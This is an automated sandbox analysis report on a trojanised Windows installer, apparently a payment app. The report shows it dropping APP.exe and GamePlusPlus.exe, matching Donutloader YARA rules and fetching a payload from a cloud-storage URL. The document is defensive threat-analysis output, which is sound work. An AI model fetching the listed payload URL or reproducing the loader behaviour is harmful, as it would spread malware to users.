Source: APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngxk
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000058F1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2369177126.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlxk
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2634268041.00000000235E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpxk
Source: APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterxk
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2510566311.0000000015989000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/APP.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443

Source: GamePlusPlus.exe, 0000000A.00000002.2494581238.00000196FBA70000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_fbced815-b

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

10_2_00007FF646E84790

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2564910730.000000001E430000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.2494156161.00000196FB690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2566214596.00000000202C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.2493857823.00000196F9E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Program Files\Weekplus\mpclient64.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Program Files\Weekplus\mpclient.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Code function: 10_2_00000196FB6DD5A8 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,

10_2_00000196FB6DD5A8

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55AA430	0_2_00007FFDA55AA430
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55A84D0	0_2_00007FFDA55A84D0
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55AB191	0_2_00007FFDA55AB191
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55AC130	0_2_00007FFDA55AC130
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA5592CA0	0_2_00007FFDA5592CA0
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55C4CB0	0_2_00007FFDA55C4CB0
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55A7F6E	0_2_00007FFDA55A7F6E
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55AB990	0_2_00007FFDA55AB990
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55AA930	0_2_00007FFDA55AA930
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55A8B20	0_2_00007FFDA55A8B20
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_1E43479C	0_2_1E43479C
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_1E434B78	0_2_1E434B78
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_1E434FA8	0_2_1E434FA8
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_1E438254	0_2_1E438254
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_1E435A5C	0_2_1E435A5C
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_1E4338C0	0_2_1E4338C0
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FFD345576BD	3_2_00007FFD345576BD
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FFD34556339	3_2_00007FFD34556339
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FFD34558AFA	3_2_00007FFD34558AFA
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FFD34622F27	3_2_00007FFD34622F27
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E84790	10_2_00007FF646E84790
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E858F0	10_2_00007FF646E858F0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E985D0	10_2_00007FF646E985D0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E8A190	10_2_00007FF646E8A190
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E82370	10_2_00007FF646E82370
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E99520	10_2_00007FF646E99520
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E86D20	10_2_00007FF646E86D20
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E92950	10_2_00007FF646E92950
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646EA0950	10_2_00007FF646EA0950
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646EA06F0	10_2_00007FF646EA06F0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E9FA68	10_2_00007FF646E9FA68
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B196C20	10_2_00007FFD9B196C20
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1A7A7C	10_2_00007FFD9B1A7A7C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1B32D8	10_2_00007FFD9B1B32D8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1B0300	10_2_00007FFD9B1B0300
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B19FAFC	10_2_00007FFD9B19FAFC
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1B2320	10_2_00007FFD9B1B2320
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1A1990	10_2_00007FFD9B1A1990
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1AB1C0	10_2_00007FFD9B1AB1C0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1AE20C	10_2_00007FFD9B1AE20C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1A50B8	10_2_00007FFD9B1A50B8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1980B0	10_2_00007FFD9B1980B0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1A9158	10_2_00007FFD9B1A9158
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B197920	10_2_00007FFD9B197920
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1AA7B4	10_2_00007FFD9B1AA7B4
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1AE000	10_2_00007FFD9B1AE000
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B19FFE8	10_2_00007FFD9B19FFE8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1B66F8	10_2_00007FFD9B1B66F8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B19FD80	10_2_00007FFD9B19FD80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B195D80	10_2_00007FFD9B195D80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1A55B8	10_2_00007FFD9B1A55B8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1A74C0	10_2_00007FFD9B1A74C0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FB6DCD9C	10_2_00000196FB6DCD9C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FB6DD5A8	10_2_00000196FB6DD5A8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FB6DD178	10_2_00000196FB6DD178
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FB6E0854	10_2_00000196FB6E0854
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FB6DE05C	10_2_00000196FB6DE05C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FB6DBEC0	10_2_00000196FB6DBEC0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB1A9E0	10_2_00000196FBB1A9E0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB19F30	10_2_00000196FBB19F30
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB11530	10_2_00000196FBB11530
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB17AA0	10_2_00000196FBB17AA0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB211B7	10_2_00000196FBB211B7
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB228B0	10_2_00000196FBB228B0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB22F60	10_2_00000196FBB22F60
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB19710	10_2_00000196FBB19710
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB26690	10_2_00000196FBB26690
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB126D0	10_2_00000196FBB126D0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB2F600	10_2_00000196FBB2F600
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB30620	10_2_00000196FBB30620
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB1A580	10_2_00000196FBB1A580
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB17550	10_2_00000196FBB17550
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB15B80	10_2_00000196FBB15B80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB163A0	10_2_00000196FBB163A0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00000196FBB1CBA0	10_2_00000196FBB1CBA0

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: String function: 00007FFD9B198B90 appears 36 times
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FFDA55AE6E0 appears 40 times
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FFDA55B03D0 appears 214 times
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FFDA55B0A00 appears 85 times
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FFDA55B0990 appears 69 times

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3160 -s 2900

Source: #U6c47#U8054#U652f#U4ed8.exe	Static PE information: No import functions for PE file found
Source: APP.exe.0.dr	Static PE information: No import functions for PE file found

Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005A02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs #U6c47#U8054#U652f#U4ed8.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs #U6c47#U8054#U652f#U4ed8.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.000000000599F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLMNK.exe, vs #U6c47#U8054#U652f#U4ed8.exe

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2564910730.000000001E430000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.2494156161.00000196FB690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2566214596.00000000202C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.2493857823.00000196F9E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Program Files\Weekplus\mpclient64.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Program Files\Weekplus\mpclient.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal92.troj.evad.winEXE@13/25@3/3

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Code function: 10_2_00000196FBB13080 GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,swprintf,swprintf,

10_2_00000196FBB13080

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Code function: 10_2_00000196FBB13470 CoInitializeEx,CoCreateInstance,swprintf,

10_2_00000196FBB13470

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File created: C:\Program Files\Weekplus

Jump to behavior

Source: C:\Program Files\Weekplus\APP.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\APP.exe.log

Jump to behavior

Source: C:\Program Files\Weekplus\APP.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3160
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6276
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Mutant created: \Sessions\1\BaseNamedObjects\vrdashboard.exe
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{exeName}_Mutex

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2anqrhei.ivv.ps1

Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: #U6c47#U8054#U652f#U4ed8.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe	Virustotal: Detection: 28%
Source: #U6c47#U8054#U652f#U4ed8.exe	ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File read: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe "C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe"
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Program Files\Weekplus\APP.exe "C:\Program Files\Weekplus\APP.exe"
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3160 -s 2900
Source: unknown	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe "C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6276 -s 1380
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Program Files\Weekplus\APP.exe "C:\Program Files\Weekplus\APP.exe"	Jump to behavior
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
